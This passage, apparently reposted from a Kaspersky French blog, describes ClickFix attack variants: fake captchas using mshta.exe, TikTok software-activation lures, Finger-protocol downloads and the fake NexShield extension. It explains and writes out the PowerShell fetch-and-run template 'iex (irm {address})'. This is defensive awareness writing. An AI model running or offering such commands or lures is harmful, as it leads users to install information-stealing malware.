● Kaspersky FR 📅 13/03/2026 à 08:57

Géopolitique 👤 Kaspersky Team

🏷️ Tags : iran cert pto rag réseau rte xdr

Il y a environ un an, nous avons publié un article sur la technique ClickFix, qui devenait de plus en plus populaire parmi les cybercriminels. Le principe des attaques utilisant la technique ClickFix consiste à convaincre la victime, sous divers prétextes, d’exécuter une commande malveillante sur son ordinateur. Autrement dit, du point de vue des solutions de cybersécurité, la commande est exécuté au nom de l’utilisateur concerné et avec ses privilèges. Lors des premières utilisations de cette technique, les cybercriminels tentaient de convaincre les victimes qu’elles devaient exécuter une commande pour résoudre un problème ou un captcha, et dans la grande majorité des cas, la commande malveillante était un script PowerShell. Cependant, depuis lors, les pirates informatiques ont trouvé une série de nouvelles ruses, que les utilisateurs devraient connaître, ainsi qu’un certain nombre de nouvelles variantes de diffusion de charges utiles malveillantes, qui méritent également d’être surveillées. Utilisation de l’utilitaire mshta.exe L’année dernière, les experts de Microsoft ont publié un rapport sur les cyberattaques visant les propriétaires d’hôtels collaborant avec la plateforme Booking.com. Les cybercriminels ont envoyé de fausses notifications de la part du service, ou des emails prétendant provenir d’invités attirant l’attention sur une évaluation. Dans les deux cas, l’email contenait un lien vers une page imitant le site Booking.com, qui demandait à la victime de prouver qu’elle n’était pas un robot en exécutant un code via le menu Exécuter. Il existe deux différences essentielles entre cette attaque et la technique ClickFix. La première consiste à ne pas demander à l’utilisateur de copier la chaîne (après tout, une chaîne contenant du code éveille parfois des soupçons). Cette-ci est copiée dans la mémoire tampon d’échange par le site malveillant, généralement lorsque l’utilisateur clique sur une case à cocher qui imite le mécanisme reCAPTCHA. La seconde consiste à ce que la chaîne malveillante appelle l’utilitaire légitime mshta.exe, qui permet d’exécuter des applications écrites en HTML. Elle contacte le serveur des cybercriminels et exécute la charge utile malveillante. Vidéo sur TikTok et PowerShell avec des privilèges d’administrateur En octobre 2025, le site BleepingComputer a publié un article au sujet d’une campagne visant à diffuser des programmes malveillants au moyen d’instructions dans des vidéos TikTok. Les vidéos elles-mêmes imitent des tutoriels vidéo indiquant comment activer gratuitement des logiciels propriétaires. Le conseil qu’elles donnent se résume à la nécessité de lancer PowerShell avec des privilèges d’administrateur, puis d’exécuter la commande iex (irm {address}). Ici, la commande irm télécharge un script malveillant à partir d’un serveur contrôlé par les pirates informatiques, et la commande iex (Invoke-Expression) l’exécute. Le script, à son tour, télécharge un programme malveillant voleur d’informations sur l’ordinateur de la victime. Utilisation du protocole Finger Une autre variante inhabituelle de l’attaque ClickFix reprend la même technique de captcha, mais le script malveillant utilise le protocole Finger, devenu obsolète. L’utilitaire du même nom permet à n’importe qui de demander des données au sujet d’un utilisateur particulier sur un serveur distant. Le protocole est rarement utilisé de nos jours, mais il continue d’être pris en charge par Windows, macOS et un certain nombre de systèmes basés sur Linux. L’utilisateur est encouragé à ouvrir l’interface de ligne de commande et à y exécuter une commande qui établit une connexion via le protocole Finger (en utilisant le port TCP 79) avec le serveur des pirates informatiques. Le protocole transfère uniquement des informations textuelles, mais cette opération suffit pour télécharger un autre script sur l’ordinateur de la victime, qui installe alors le programme malveillant. Variante de la technique CrashFix Une autre variante de la technique ClickFix se distingue par l’utilisation d’une ingénierie sociale plus élaborée. Cette méthode a été utilisée dans le cadre d’une attaque contre des utilisateurs qui tentaient de trouver un outil permettant de bloquer les bannières publicitaires, les traqueurs, les programmes malveillants et d’autres contenus indésirables sur les pages Internet. Alors qu’elles cherchaient une extension appropriée pour Google Chrome, les victimes ont trouvé un module appelé NexShield – Advanced Web Guardian, qui était en fait un clone d’un véritable logiciel fonctionnel, mais qui, à un certain moment, faisait planter le navigateur et affichait une fausse notification concernant un problème de sécurité détecté et la nécessité d’exécuter une « analyse » pour corriger l’erreur. Si l’utilisateur acceptait, il recevait des instructions sur la marche à suivre pour ouvrir le menu Exécuter et lancer une commande que l’extension avait préalablement copiée dans le presse-papiers. La commande copiait le fichier c

🔗 Lire l'article original 👁️ 1 lecture